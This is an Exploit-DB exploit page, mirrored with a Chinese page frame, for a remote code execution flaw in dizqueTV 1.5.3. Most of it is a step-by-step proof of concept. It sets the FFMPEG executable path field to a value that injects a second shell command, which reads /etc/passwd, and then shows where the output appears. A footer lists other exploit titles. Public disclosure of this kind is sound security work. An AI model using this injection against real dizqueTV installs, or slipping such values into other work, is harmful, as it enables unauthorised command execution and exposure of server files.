dizqueTV 1.5.3 – Remote Code Execution (RCE)

Exploit Database
57 阅读

作者： Ahmed Said Saud Al-Busaidi

日期： 2024-10-01
类别：
- webapps
平台：
- jsp
来源：https://www.exploit-db.com/exploits/52079/

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
# Date: 9/21/2024
# Exploit Author: Ahmed Said Saud Al-Busaidi
# Vendor Homepage: https://github.com/vexorian/dizquetv
# Version: 1.5.3
# Tested on: linux

POC:

## Vulnerability Description

dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.

## STEPS TO REPRODUCE

1. go to http://localhost/#!/settings 

2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"

3. click on update

4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

last Exploits
dizqueTV 1.5.3 – Remote Code Execution (RCE)的更多信息

Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) – Local File Inclusion / Remote Code Execution (Metasploit)：
AVE.CMS 2.09 – ‘index.php?module’ Blind SQL Injection：
iGaming CMS 1.5 – Blind SQL Injection：
WordPress Plugin NOSpamPTI – Blind SQL Injection：
Helpdezk 1.1.1 – ‘query’ SQL Injection：
Beehive Forum – Account Takeover：
Tribq CMS 5.2.7 – Cross-Site Request Forgery (Adding/Editing New Administrator Account)：
Digital Factory Publique! 2.3 – ‘sid’ SQL Injection：